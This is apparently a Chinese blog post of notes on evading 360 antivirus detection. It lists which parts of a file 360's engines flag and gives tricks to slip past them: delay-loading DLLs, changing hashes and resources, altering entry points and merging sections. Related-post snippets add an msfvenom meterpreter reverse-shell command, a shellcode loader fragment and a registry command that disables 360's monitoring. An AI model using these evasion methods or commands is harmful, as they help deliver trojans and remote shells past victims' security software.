360免杀笔记

原创 已于 2024-01-16 09:34:15 修改 · 96 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记

于 2019-06-22 14:45:24 首次发布
博客介绍了360的BD、QVM和云引擎相关内容。360 - BD引擎将特征码定位在版权、字符串、资源位置;360 - QVM引擎定位较麻烦,涉及OLEAUT32.dll等;360 - 云引擎可修改文件md5、资源,检测出变异病毒时改入口点等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、360---BD引擎

(1)360-Bd把特征码定位在版权部分

(2)360-Bd把字符串定位在字符串内面

(3)360-Bd吧特特征码定位在资源位置(版权,图标,图片之类的)

2、360-QVM引擎

(1)定位比较麻烦

(2)定位到OLEAUT32.dll,修改时候,延时加载

#pragma comment (linker,"/DELAYLOAD:OLEAUT32.dll");

#pragma comment (linker,"/DELAYLOAD:ole32.dll")

(3)定位到编译器产生的调试信息

(4)定位内核dll,动态api

3、360-云引擎

(1)修改文件md5

(1)改资源,图片,加版权等

(2)如果检测出是变异的病毒,改入口点

(自定义入口,导入需要的lib)

将入口点winMain改成入口点函数。导入lib

添加预编译到stdafx.h中

合并区段

shellcode之360安全卫士(shecodject)(一)
ZPFCD的博客
07-16 971
shellcode
手法学习(纯笔记为了方便查询基本是记录大佬链接水文)
qq_45290991的博客
10-01 927
0、前言 关于原理的学习可以参考远控从入门到实践(1):基础篇 - FreeBuf网络安全行业门户 [原创]技术有一套(方法大集结)(Anti-AntiVirus)-软件逆向-看雪论坛-安全社区|安全招聘|bbs.pediy.com 一、mimikataz改源码方法过360 参考:Mimikatz源码 | mimikataz是C写的,有源码,有源码的话,静态修改特征码绕过特征码扫描: 图片参考月神:环境为vs2012 注意:如果还是出现很多告警信息,那就降低报警级别:.
360壳,
06-11
360壳过360云查。主动一切防御提示
360安全卫士
qq_43647462的博客
11-15 883
绕过360安全卫士(无法绕过火绒) Buchiyexiao #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "veil_shellcode"; void main() { LPVOID Memory = VirtualAlloc
最新360
12-17
最新360云查
360全家桶
sash1mi
01-28 4185
360全家桶 1.kali生成一串shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c 2.VS编写程序 这里给出代码 #include <windows.h> #include <stdio.h> (这里是我生成的shellcode) unsigned char
全套教程+工具合集
最新发布
08-25
远控专题(1)-基础篇.pdf 远控专题(2)-msfvenom隐藏的参数.pdf 远控专题(3)-msf自带(VT率35-69).pdf 元控专题(4)-Evasion模块(VT率12-71).pdf 远控专题(5)-Veil(VT率23-...
源码笔记
record
01-02 2147
各个毒软件查特点不一样,大致总结以下,API函数,字符串,代码段,资源段。方法大致有如下几种手段,动态函数调用,延迟加载DLL,合并区段,字符串隐藏,删版权换版权,花指令,反调试等等细节,以上几种方法基本上过掉大部分软,当然有能力也可以自己改变程序的代码实现原来的功能。 1.动态函数调用 有两个函数是不能调用的,GetProcAddress,LoadLibrary。 毒软件如果查
毒与技术详解---白嫖党福音
01-15 1971
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到软waf这些大敌,当然主要还是软,因此我们不得不考虑进而实现我们渗透测试目的。 0x02 概念 2.1 类别 简单总结下我知道的类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描
冰蝎php马静态
qq_61807674的博客
04-02 1574
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原马都查不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态而已,其实处理还是不够到位的,心态要端正,很不错了!
360源码
03-03
ff专业超级远程控制。超强的管理功能,适用于电脑爱好者、家庭、学校、公司、单位远程管理计算机! --------------- 其它应用就不要我多说了吧~呵呵
利用360软件设置的360终极.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360.百分之百过360.... 希望大家采纳!!!!!
最新360全套,无提示上线,世界毒网!!
12-18
最新360全套
一键360四引擎
11-19
360360360360360360360360360360360360360360360360360360360360360
MSF配合shellter实现360
weixin_44508748的博客
04-29 1073
利用shellter工具将MSF生成的木马文件与其他文件捆绑在一起,达到绕过毒软件建立会话控制服务器的目的。本次的绕过的毒软件为360。 攻击/kali/192.168.1.7 靶机/win7/ 一、运行shellter工具 ①下载shellter: apt-get install shellter ②安装Windows运行环境(等待时间稍长) dpkg --add-architecture...
教你制作一个木马360
EdisonJH的博客
03-17 3921
制作一个360的木马 我们用到工具: kail:利用msfvenom (美少妇) MSFvenom 的常用命令 1、我们进入到msf里面 在msf后生成一个exe的木马文件,这-p 就是生成window 模块playload、-e x86平台 -i 编码5ci ihost:你的ip iport你的端口 、-f 生成的exe文件,>名字就是shell.exe msfvenom -p wi...
网络安全进阶篇之(十四章-8)使用掩日配合CS360
划水的小白白
05-30 1144
文章目录一、 概念1.1 360 安全卫士和 360 毒二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 3603.3 火绒 一、 概念 1.1 360 安全卫士和 360 360 毒是 360 安全中心出品的一款费的云安全毒软件。 它创新性地整合了五大领先查引擎,包括国际知名的 BitDefender 病毒查引擎、 Avira(小红伞)病毒查引擎、360 云查引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二
在一黑客论坛上看见的:360技术介绍
ybds88的专栏
01-12 4202
一、ASM汇编这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。再找一个小空段,记下地址,假设为4
msfvenom制作360,腾讯木马
小刚的博客
05-19 4215
介绍 msfvenom是用来制作msf所支持的木马文件的,在这介绍一下msfvenom的几个使用参数,和如何制作木马。 主要过程就是使用msfvenom指定特定编码,编码次数等生成c语言代码,再使用==VC++==生成程序文件。 msfvenom参数 这里列出几个常用参数,其他参数可使用help查看。 -p 指定所使用的payload -e 指定使用的编码器 -b 删除无效字符 -i 指定编码次数 -f 指定生成的文件类型 -l 列出可使用的项 -o 导出为某文件
如何实现为知笔记4.2.476版本登录本地使用
- 通过该安装程序可以安装特定版本的为知笔记软件,并按照提供的文档(为知笔记登录方法.docx)进行登录本地同步的配置。 - 用户可能需要在软件界面中进行一些额外的设置,以确保登录同步功能正常工作。 6....
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值